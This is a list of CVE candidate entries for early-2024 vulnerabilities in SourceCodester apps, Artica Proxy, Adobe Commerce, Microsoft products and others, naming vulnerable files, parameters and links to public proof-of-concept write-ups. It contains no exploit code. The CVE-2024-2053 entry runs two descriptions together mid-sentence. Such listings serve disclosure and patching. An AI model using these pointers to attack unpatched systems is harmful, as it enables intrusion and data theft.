CVE 2024 20721 Candidate Acrobat Reader T5 (MSFT Edge) versions 120.0.2210.91 and earlier are affected by an Improper Input Validation vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20721 | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20721 Assigned (20231204)
CVE 2024 20720 Candidate Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue does not require user interaction. MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html | URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html Assigned (20231204)
CVE 2024 2072 Candidate A vulnerability, which was classified as problematic, was found in SourceCodester Flashcard Quiz App 1.0. This affects an unknown part of the file /endpoint/update-flashcard.php. The manipulation of the argument question/answer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255387. MISC:VDB-255387 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255387 | MISC:VDB-255387 | SourceCodester Flashcard Quiz App update-flashcard.php cross site scripting | URL:https://vuldb.com/?id.255387 | MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFlashcard%20Quiz%20App%20Using%20PHP%20and%20MySQL%5D%20XSS%20on%20update-flashcard.php.md | URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFlashcard%20Quiz%20App%20Using%20PHP%20and%20MySQL%5D%20XSS%20on%20update-flashcard.php.md Assigned (20240301)
CVE 2024 20719 Candidate Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an admin attacker to inject malicious scripts into every admin page. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field, that could be leveraged to gain admin access. MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html | URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html Assigned (20231204)
CVE 2024 20718 Candidate Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by a Cross-Site Request Forgery (CSRF) vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to trick a victim into performing actions they did not intend to do, which could be used to bypass security measures and gain unauthorized access. Exploitation of this issue requires user interaction, typically in the form of the victim clicking a link or visiting a malicious website. MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html | URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html Assigned (20231204)
CVE 2024 20717 Candidate Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html | URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html Assigned (20231204)
CVE 2024 20716 Candidate Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to an application denial-of-service. A high-privileged attacker could leverage this vulnerability to exhaust system resources, causing the application to slow down or crash. Exploitation of this issue does not require user interaction. MISC:https://helpx.adobe.com/security/products/magento/apsb24-03.html | URL:https://helpx.adobe.com/security/products/magento/apsb24-03.html Assigned (20231204)
CVE 2024 20715 Candidate Adobe Substance 3D Stager versions 2.1.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. MISC:https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html | URL:https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html Assigned (20231204)
CVE 2024 2071 Candidate A vulnerability, which was classified as problematic, has been found in SourceCodester FAQ Management System 1.0. Affected by this issue is some unknown functionality of the component Update FAQ. The manipulation of the argument Frequently Asked Question leads to cross site scripting. The attack may be launched remotely. VDB-255386 is the identifier assigned to this vulnerability. MISC:VDB-255386 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255386 | MISC:VDB-255386 | SourceCodester FAQ Management System Update FAQ cross site scripting | URL:https://vuldb.com/?id.255386 | MISC:https://github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/faq-management-system.md | URL:https://github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/faq-management-system.md Assigned (20240301)
CVE 2024 2070 Candidate A vulnerability classified as problematic was found in SourceCodester FAQ Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /endpoint/add-faq.php. The manipulation of the argument question/answer leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255385 was assigned to this vulnerability. MISC:VDB-255385 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255385 | MISC:VDB-255385 | SourceCodester FAQ Management System add-faq.php cross site scripting | URL:https://vuldb.com/?id.255385 | MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFAQ%20Management%20System%20Using%20PHP%20and%20MySQL%5D%20XSS%20on%20add-faq.php.md | URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFAQ%20Management%20System%20Using%20PHP%20and%20MySQL%5D%20XSS%20on%20add-faq.php.md Assigned (20240301)
CVE 2024 20697 Candidate Windows Libarchive Remote Code Execution Vulnerability MISC:Windows Libarchive Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20697 Assigned (20231128)
CVE 2024 20695 Candidate Skype for Business Information Disclosure Vulnerability MISC:Skype for Business Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20695 Assigned (20231128)
CVE 2024 20694 Candidate Windows CoreMessaging Information Disclosure Vulnerability MISC:Windows CoreMessaging Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20694 Assigned (20231128)
CVE 2024 20692 Candidate Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability MISC:Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20692 Assigned (20231128)
CVE 2024 20691 Candidate Windows Themes Information Disclosure Vulnerability MISC:Windows Themes Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20691 Assigned (20231128)
CVE 2024 20690 Candidate Windows Nearby Sharing Spoofing Vulnerability MISC:Windows Nearby Sharing Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20690 Assigned (20231128)
CVE 2024 2069 Candidate A vulnerability classified as critical has been found in SourceCodester FAQ Management System 1.0. Affected is an unknown function of the file /endpoint/delete-faq.php. The manipulation of the argument faq leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255384. MISC:VDB-255384 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255384 | MISC:VDB-255384 | SourceCodester FAQ Management System delete-faq.php sql injection | URL:https://vuldb.com/?id.255384 | MISC:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFAQ%20Management%20System%20Using%20PHP%20and%20MySQL%5D%20SQLi%20on%20delete-faq.php.md | URL:https://github.com/smurf-reigz/security/blob/main/proof-of-concepts/SOURCECODESTER%20%5BFAQ%20Management%20System%20Using%20PHP%20and%20MySQL%5D%20SQLi%20on%20delete-faq.php.md Assigned (20240301)
CVE 2024 20682 Candidate Windows Cryptographic Services Remote Code Execution Vulnerability MISC:Windows Cryptographic Services Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20682 Assigned (20231128)
CVE 2024 20681 Candidate Windows Subsystem for Linux Elevation of Privilege Vulnerability MISC:Windows Subsystem for Linux Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20681 Assigned (20231128)
CVE 2024 20680 Candidate Windows Message Queuing Client (MSMQC) Information Disclosure MISC:Windows Message Queuing Client (MSMQC) Information Disclosure | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20680 Assigned (20231128)
CVE 2024 2068 Candidate A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /endpoint/update-computer.php. The manipulation of the argument model leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255383. MISC:VDB-255383 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255383 | MISC:VDB-255383 | SourceCodester Computer Inventory System update-computer.php cross site scripting | URL:https://vuldb.com/?id.255383 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/STORED%20XSS%20upadte-computer.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/STORED%20XSS%20upadte-computer.php%20.md Assigned (20240301)
CVE 2024 20679 Candidate Azure Stack Hub Spoofing Vulnerability MISC:Azure Stack Hub Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20679 Assigned (20231128)
CVE 2024 20677 Candidate A security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365. As of February 13, 2024, the ability to insert FBX files has also been disabled in 3D Viewer. 3D models in Office documents that were previously inserted from a FBX file will continue to work as expected unless the Link to File option was chosen at insert time. This change is effective as of the January 9, 2024 security update. MISC:Microsoft Office Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20677 Assigned (20231128)
CVE 2024 20676 Candidate Azure Storage Mover Remote Code Execution Vulnerability MISC:Azure Storage Mover Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20676 Assigned (20231128)
CVE 2024 20673 Candidate Microsoft Office Remote Code Execution Vulnerability MISC:Microsoft Office Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20673 Assigned (20231128)
CVE 2024 20671 Candidate Microsoft Defender Security Feature Bypass Vulnerability MISC:Microsoft Defender Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20671 Assigned (20231128)
CVE 2024 2067 Candidate A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/delete-computer.php. The manipulation of the argument computer leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255382 is the identifier assigned to this vulnerability. MISC:VDB-255382 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255382 | MISC:VDB-255382 | SourceCodester Computer Inventory System delete-computer.php sql injection | URL:https://vuldb.com/?id.255382 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/SQL%20Injection%20delete-computer.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/SQL%20Injection%20delete-computer.php%20.md Assigned (20240301)
CVE 2024 20667 Candidate Azure DevOps Server Remote Code Execution Vulnerability MISC:Azure DevOps Server Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20667 Assigned (20231128)
CVE 2024 20666 Candidate BitLocker Security Feature Bypass Vulnerability MISC:BitLocker Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20666 Assigned (20231128)
CVE 2024 20662 Candidate Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability MISC:Windows Online Certificate Status Protocol (OCSP) Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20662 Assigned (20231128)
CVE 2024 20661 Candidate Microsoft Message Queuing Denial of Service Vulnerability MISC:Microsoft Message Queuing Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20661 Assigned (20231128)
CVE 2024 2066 Candidate A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/add-computer.php. The manipulation of the argument model leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255381 was assigned to this vulnerability. MISC:VDB-255381 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255381 | MISC:VDB-255381 | SourceCodester Computer Inventory System add-computer.php cross site scripting | URL:https://vuldb.com/?id.255381 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/STORED%20XSS%20add-computer.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Computer%20Inventory%20System%20Using%20PHP/STORED%20XSS%20add-computer.php%20.md Assigned (20240301)
CVE 2024 20658 Candidate Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability MISC:Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20658 Assigned (20231128)
CVE 2024 20657 Candidate Windows Group Policy Elevation of Privilege Vulnerability MISC:Windows Group Policy Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20657 Assigned (20231128)
CVE 2024 20656 Candidate Visual Studio Elevation of Privilege Vulnerability MISC:Visual Studio Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20656 Assigned (20231128)
CVE 2024 20655 Candidate Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability MISC:Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20655 Assigned (20231128)
CVE 2024 20653 Candidate Microsoft Common Log File System Elevation of Privilege Vulnerability MISC:Microsoft Common Log File System Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20653 Assigned (20231128)
CVE 2024 20652 Candidate Windows HTML Platforms Security Feature Bypass Vulnerability MISC:Windows HTML Platforms Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20652 Assigned (20231128)
CVE 2024 2065 Candidate A vulnerability was found in SourceCodester Barangay Population Monitoring System up to 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /endpoint/update-resident.php. The manipulation of the argument full_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255380. MISC:VDB-255380 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255380 | MISC:VDB-255380 | SourceCodester Barangay Population Monitoring System update-resident.php cross site scripting | URL:https://vuldb.com/?id.255380 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Barangay%20Population%20Monitoring%20System/Stored%20XSS%20update-resident.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Barangay%20Population%20Monitoring%20System/Stored%20XSS%20update-resident.php%20.md Assigned (20240301)
CVE 2024 2064 Candidate A vulnerability has been found in rahman SelectCours 1.0 and classified as problematic. Affected by this vulnerability is the function getCacheNames of the file CacheController.java of the component Template Handler. The manipulation of the argument fragment leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255379. MISC:VDB-255379 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255379 | MISC:VDB-255379 | rahman SelectCours Template CacheController.java getCacheNames injection | URL:https://vuldb.com/?id.255379 | MISC:https://github.com/Andriesces/SelectCours-_Sever-side-Template-injection/blob/main/README.md | URL:https://github.com/Andriesces/SelectCours-_Sever-side-Template-injection/blob/main/README.md Assigned (20240301)
CVE 2024 2063 Candidate A vulnerability, which was classified as problematic, was found in SourceCodester Petrol Pump Management Software 1.0. Affected is an unknown function of the file /admin/app/profile_crud.php. The manipulation of the argument username leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255378 is the identifier assigned to this vulnerability. MISC:VDB-255378 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255378 | MISC:VDB-255378 | SourceCodester Petrol Pump Management Software profile_crud.php cross site scripting | URL:https://vuldb.com/?id.255378 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/profile_crud.php%20Unauthenticated%20STORED%20XSS.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/profile_crud.php%20Unauthenticated%20STORED%20XSS.md Assigned (20240301)
CVE 2024 2062 Candidate A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. This issue affects some unknown processing of the file /admin/edit_categories.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255377 was assigned to this vulnerability. MISC:VDB-255377 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255377 | MISC:VDB-255377 | SourceCodester Petrol Pump Management Software edit_categories.php sql injection | URL:https://vuldb.com/?id.255377 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/edit_categories.php%20SQL%20Injection.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/edit_categories.php%20SQL%20Injection.md Assigned (20240301)
CVE 2024 2061 Candidate A vulnerability classified as critical was found in SourceCodester Petrol Pump Management Software 1.0. This vulnerability affects unknown code of the file /admin/edit_supplier.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255376. MISC:VDB-255376 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255376 | MISC:VDB-255376 | SourceCodester Petrol Pump Management Software edit_supplier.php sql injection | URL:https://vuldb.com/?id.255376 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/edit_supplier.php%20SQL%20Injection.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/edit_supplier.php%20SQL%20Injection.md Assigned (20240301)
CVE 2024 2060 Candidate A vulnerability classified as critical has been found in SourceCodester Petrol Pump Management Software 1.0. This affects an unknown part of the file /admin/app/login_crud.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255375. MISC:VDB-255375 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255375 | MISC:VDB-255375 | SourceCodester Petrol Pump Management Software login_crud.php sql injection | URL:https://vuldb.com/?id.255375 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/login_crud.php%20SQL%20Injection.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/login_crud.php%20SQL%20Injection.md Assigned (20240301)
CVE 2024 2059 Candidate A vulnerability was found in SourceCodester Petrol Pump Management Software 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/app/service_crud.php. The manipulation of the argument photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-255374 is the identifier assigned to this vulnerability. MISC:VDB-255374 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255374 | MISC:VDB-255374 | SourceCodester Petrol Pump Management Software service_crud.php unrestricted upload | URL:https://vuldb.com/?id.255374 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/service_crud.php%20Unauthenticated%20Arbitrary%20File%20Upload.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/service_crud.php%20Unauthenticated%20Arbitrary%20File%20Upload.md Assigned (20240301)
CVE 2024 2058 Candidate A vulnerability was found in SourceCodester Petrol Pump Management Software 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/app/product.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255373 was assigned to this vulnerability. MISC:VDB-255373 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255373 | MISC:VDB-255373 | SourceCodester Petrol Pump Management Software product.php unrestricted upload | URL:https://vuldb.com/?id.255373 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/Unauthenticated%20Arbitrary%20File%20Upload.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20Petrol%20pump%20management%20software/Unauthenticated%20Arbitrary%20File%20Upload.md | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/Surya2Developer%20Online_shopping_-system/SOURCECODESTER%20Petrol%20pump%20management%20software/Unauthenticated%20Arbitrary%20File%20Upload.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/Surya2Developer%20Online_shopping_-system/SOURCECODESTER%20Petrol%20pump%20management%20software/Unauthenticated%20Arbitrary%20File%20Upload.md Assigned (20240301)
CVE 2024 2057 Candidate A vulnerability was found in LangChain langchain_community 0.0.26. It has been classified as critical. Affected is the function load_local in the library libs/community/langchain_community/retrievers/tfidf.py of the component TFIDFRetriever. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.0.27 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-255372. MISC:VDB-255372 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.255372 | MISC:VDB-255372 | LangChain langchain_community TFIDFRetriever tfidf.py load_local server-side request forgery | URL:https://vuldb.com/?id.255372 | MISC:https://github.com/bayuncao/vul-cve-16 | URL:https://github.com/bayuncao/vul-cve-16 | MISC:https://github.com/bayuncao/vul-cve-16/tree/main/PoC.pkl | URL:https://github.com/bayuncao/vul-cve-16/tree/main/PoC.pkl | MISC:https://github.com/langchain-ai/langchain/pull/18695 | URL:https://github.com/langchain-ai/langchain/pull/18695 Assigned (20240301)
CVE 2024 2056 Candidate Services that are running and bound to the loopback interface on the Artica Proxy are accessible through the proxy service. In particular, the "tailon" service is running, running as the root user, is bound to the loopback interface, and is listening on TCP port 7050. Security issues associated with exposing this network service are documented at gvalkov's 'tailon' GitHub repo. Using the tailon service, the contents of any file on the Artica Proxy can be viewed. FULLDISC:20240305 KL-001-2024-004: Artica Proxy Loopback Services Remotely Accessible Unauthenticated | URL:http://seclists.org/fulldisclosure/2024/Mar/14 | MISC:https://github.com/gvalkov/tailon#security | URL:https://github.com/gvalkov/tailon#security | MISC:https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt | URL:https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt Assigned (20240301)
CVE 2024 2055 Candidate The "Rich Filemanager" feature of Artica Proxy provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. FULLDISC:20240305 KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability | URL:http://seclists.org/fulldisclosure/2024/Mar/13 | MISC:https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt | URL:https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt Assigned (20240301)
CVE 2024 2054 Candidate The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. FULLDISC:20240305 KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability | URL:http://seclists.org/fulldisclosure/2024/Mar/12 | MISC:https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt | URL:https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt Assigned (20240301)
CVE 2024 2053 Candidate The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. This issue was demonstrated on version 4.50 of the The Artica-Proxy administrative web application attempts to prevent local file inclusion. These protections can be bypassed and arbitrary file requests supplied by unauthenticated users will be returned according to the privileges of the "www-data" user. FULLDISC:20240305 KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability | URL:http://seclists.org/fulldisclosure/2024/Mar/11 | MISC:https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt | URL:https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt Assigned (20240301)
CVE 2024 2052 Candidate CWE-552: Files or Directories Accessible to External Parties vulnerability exists that could allow unauthenticated files and logs exfiltration and download of files when an attacker modifies the URL to download to a different location. MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf | URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf Assigned (20240301)
CVE 2024 2051 Candidate CWE-307: Improper Restriction of Excessive Authentication Attempts vulnerability exists that could cause account takeover and unauthorized access to the system when an attacker conducts brute-force attacks against the login form. MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf | URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf Assigned (20240301)
CVE 2024 2050 Candidate CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability exists when an attacker injects then executes arbitrary malicious JavaScript code within the context of the product. MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf | URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-072-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-072-01.pdf Assigned (20240301)
CVE 2024 2049 Candidate Server-Side Request Forgery (SSRF) in Citrix SD-WAN Standard/Premium Editions on or after 11.4.0 and before 11.4.4.46 allows an attacker to disclose limited information from the appliance via Access to management IP. MISC:https://support.citrix.com/article/CTX617071/citrix-sdwan-security-bulletin-for-cve20242049 | URL:https://support.citrix.com/article/CTX617071/citrix-sdwan-security-bulletin-for-cve20242049 Assigned (20240301)
CVE 2024 2048 Candidate Vault and Vault Enterprise (“Vault”) TLS certificate auth method did not correctly validate client certificates when configured with a non-CA certificate as trusted certificate. In this configuration, an attacker may be able to craft a malicious certificate that could be used to bypass authentication. Fixed in Vault 1.15.5 and 1.14.10. MISC:https://discuss.hashicorp.com/t/hcsec-2024-05-vault-cert-auth-method-did-not-correctly-validate-non-ca-certificates/63382 | URL:https://discuss.hashicorp.com/t/hcsec-2024-05-vault-cert-auth-method-did-not-correctly-validate-non-ca-certificates/63382 Assigned (20240301)
CVE 2024 2045 Candidate Session version 1.17.5 allows obtaining internal application files and public files from the user's device without the user's consent. This is possible because the application is vulnerable to Local File Read via chat attachments. MISC:https://fluidattacks.com/advisories/newman/ | URL:https://fluidattacks.com/advisories/newman/ | MISC:https://github.com/oxen-io/session-android/ | URL:https://github.com/oxen-io/session-android/ Assigned (20240229)
